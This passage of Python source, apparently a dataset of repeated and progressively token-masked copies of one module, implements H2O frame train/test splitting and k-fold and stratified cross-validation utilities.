If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size\n ).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError(\n 'test_size=%d should be smaller than the number of samples %d' %\n (test_size, n_samples))\n if train_size is not None and np.asarray(train_size\n ).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError(\n 'train_size=%d should be smaller than the number of samples %d' %\n (train_size, n_samples))\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif 
np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n if test_size is None:\n n_test = n_samples - n_train\n if n_train + n_test > n_samples:\n raise ValueError(\n 'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n % (n_train + n_test, n_samples))\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. 
This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. 
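As a usage sketch for h2o_train_test_split itself: the call below assumes a locally running H2O cluster, and the import path is an assumption for illustration (this module resembles skutil's h2o split utilities, but the source here does not state its package name):

import h2o
# hypothetical import path for the module shown above
from skutil.h2o.split import h2o_train_test_split

h2o.init()  # spins up or attaches to a local H2O cluster
frame = h2o.H2OFrame({
    'x': list(range(100)),
    'y': ['a', 'b'] * 50,
})

# 75/25 split when only test_size is given; stratify='y' balances the label
train, test = h2o_train_test_split(frame, test_size=0.25, random_state=42,
                                   stratify='y')
print(train.shape, test.shape)  # roughly (75, 2) and (25, 2)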
If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. 
Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. 
This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\n<function token>\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. 
